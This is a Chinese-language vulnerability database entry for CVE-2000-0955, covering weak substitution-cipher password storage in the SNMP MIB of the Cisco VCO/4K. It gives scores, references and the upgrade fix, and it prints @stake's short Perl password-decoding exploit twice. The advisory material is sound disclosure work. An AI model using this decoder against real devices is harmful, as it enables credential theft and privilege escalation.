CVE-2000-0955
CVSS7.5
发布时间 :2000-12-19 00:00:00
修订时间 :2008-09-05 16:22:17
NMCOES    

[原文]Cisco Virtual Central Office 4000 (VCO/4K) uses weak encryption to store usernames and passwords in the SNMP MIB, which allows an attacker who knows the community name to crack the password and gain privileges.


[CNNVD]Cisco Virtual Central Office漏洞(CNNVD-200012-095)

        Cisco Virtual Central Office 4000 (VCO/4K)在SNMP MIB储存用户名和密码时使用弱加密。知道团体名的攻击者破解密码和提升特权。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0955
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0955
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-095
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/5425.php
(VENDOR_ADVISORY)  XF  cisco-vco-snmp-passwords
http://www.securityfocus.com/bid/1885
(VENDOR_ADVISORY)  BID  1885
http://www.atstake.com/research/advisories/2000/a102600-1.txt
(VENDOR_ADVISORY)  ATSTAKE  A102600-1

- 漏洞信息

Cisco Virtual Central Office漏洞
高危 访问验证错误
2000-12-19 00:00:00 2005-10-20 00:00:00
远程※本地  
        Cisco Virtual Central Office 4000 (VCO/4K)在SNMP MIB储存用户名和密码时使用弱加密。知道团体名的攻击者破解密码和提升特权。

- 公告与补丁

        暂无数据

- 漏洞信息 (20372)

Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 Remote Username and Password Retrieval (EDBID:20372)
hardware remote
2000-10-26 Verified
0 @stake
N/A [点击下载]
source: http://www.securityfocus.com/bid/1885/info

A vulnerability exists in the Cisco Virtual Central Office 4000 (VCO/4K) programmable voice switch running software versions 5.13 and earlier.

The usernames and passwords for the device's SNMP administration interface are protected by a simple substitution cipher which can be easily defeated. As a result, if the "encrypted" passwords are retrieved, (for example, through the read-only community string) an attacker can obtain a list of valid usernames and passwords potentially allowing an elevation of privileges and possibly more serious consequences.

#!/usr/bin/perl

printf ("Cisco VCO/4K Password [De]Obfuscator\n");
printf ("\t\@stake, Inc.\n");
printf ("\tRex Warren, Brian Carrier, David Goldsmith\n");

printf ("Enter Password: ");
$pw = <STDIN>;
chop $pw;

printf("Result: ");
for ($pos = 0; $pos < length($pw); $pos++){
printf("%s", chr(164 - ord(substr($pw, $pos, 1))));
}
printf("\n");		

- 漏洞信息

8813
Cisco Virtual Central Office Credential Encryption Weakness
Remote / Network Access Cryptographic
Loss of Confidentiality Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2000-10-26 Unknow
2000-10-26 Unknow

- 解决方案

Upgrade to version 5.1.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Cisco CVCO/4k Remote Username and Password Retrieval Vulnerability
Access Validation Error 1885
Yes Yes
2000-10-26 12:00:00 2009-07-11 03:56:00
Reported to bugtraq by "@stake Advisories" <advisories@atstake.com> on Thu, 26 Oct 2000.

- 受影响的程序版本

Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3
Cisco Virtual Central Office 4000 (VCO/4K) 5.1.4

- 不受影响的程序版本

Cisco Virtual Central Office 4000 (VCO/4K) 5.1.4

- 漏洞讨论

A vulnerability exists in the Cisco Virtual Central Office 4000 (VCO/4K) programmable voice switch running software versions 5.13 and earlier.

The usernames and passwords for the device's SNMP administration interface are protected by a simple substitution cipher which can be easily defeated. As a result, if the "encrypted" passwords are retrieved, (for example, through the read-only community string) an attacker can obtain a list of valid usernames and passwords potentially allowing an elevation of privileges and possibly more serious consequences.

- 漏洞利用

&lt;--- cut here ---&gt;
#!/usr/bin/perl

printf ("Cisco VCO/4K Password [De]Obfuscator\n");
printf ("\t\@stake, Inc.\n");
printf ("\tRex Warren, Brian Carrier, David Goldsmith\n");

printf ("Enter Password: ");
$pw = &lt;STDIN&gt;;
chop $pw;

printf("Result: ");
for ($pos = 0; $pos &lt; length($pw); $pos++){
printf("%s", chr(164 - ord(substr($pw, $pos, 1))));
}
printf("\n");

&lt;--- cut here ---&gt;

- 解决方案

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站